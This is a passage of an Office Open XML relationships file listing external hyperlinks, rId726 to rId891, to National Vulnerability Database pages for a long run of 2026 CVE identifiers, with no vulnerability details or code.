Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90359" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90360" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90361" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90362" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90363" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90364" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90365" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90366" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90367" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90368" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90369" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90370" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90371" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90372" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90373" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90374" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90375" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90376" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90377" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90378" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90379" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90380" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90381" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90382" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90383" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90384" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90385" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90386" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90387" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90388" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90389" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90390" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90391" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90392" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90393" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90394" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90395" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90396" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90397" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90398" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90399" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90400" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90401" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90402" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90403" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90404" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90405" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90406" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90407" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90408" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90409" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90410" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90411" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90412" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90413" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90414" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90415" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90416" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90417" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90418" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90419" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90420" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90421" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90422" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90423" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90424" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90425" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90426" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90427" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90428" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90429" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90430" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90431" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90432" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90433" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90434" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90435" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92230" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92476" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92477" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92478" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92479" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92480" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92481" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92482" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92483" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92484" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92485" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92486" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92487" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92488" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92489" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92490" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92491" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92492" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92493" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92494" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92495" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92496" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92497" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92498" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92499" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92500" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92501" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92502" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92503" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92504" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92505" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92506" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92507" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92508" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92509" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92510" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92511" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92512" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92513" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92514" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92515" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92516" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92517" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92518" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92519" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92520" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92521" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92522" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92523" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92524" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92525" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93037" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93038" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93039" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93040" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93041" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93042" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93043" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93044" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93045" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93046" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93047" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93048" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93049" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93050" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93051" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93052" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93053" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93054" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93055" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93056" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93057" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93058" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93059" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93060" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93061" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93062" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93063" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93064" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93065" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93066" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93067" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93068" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93069" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93070" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93071" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93072" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93073" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93074" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 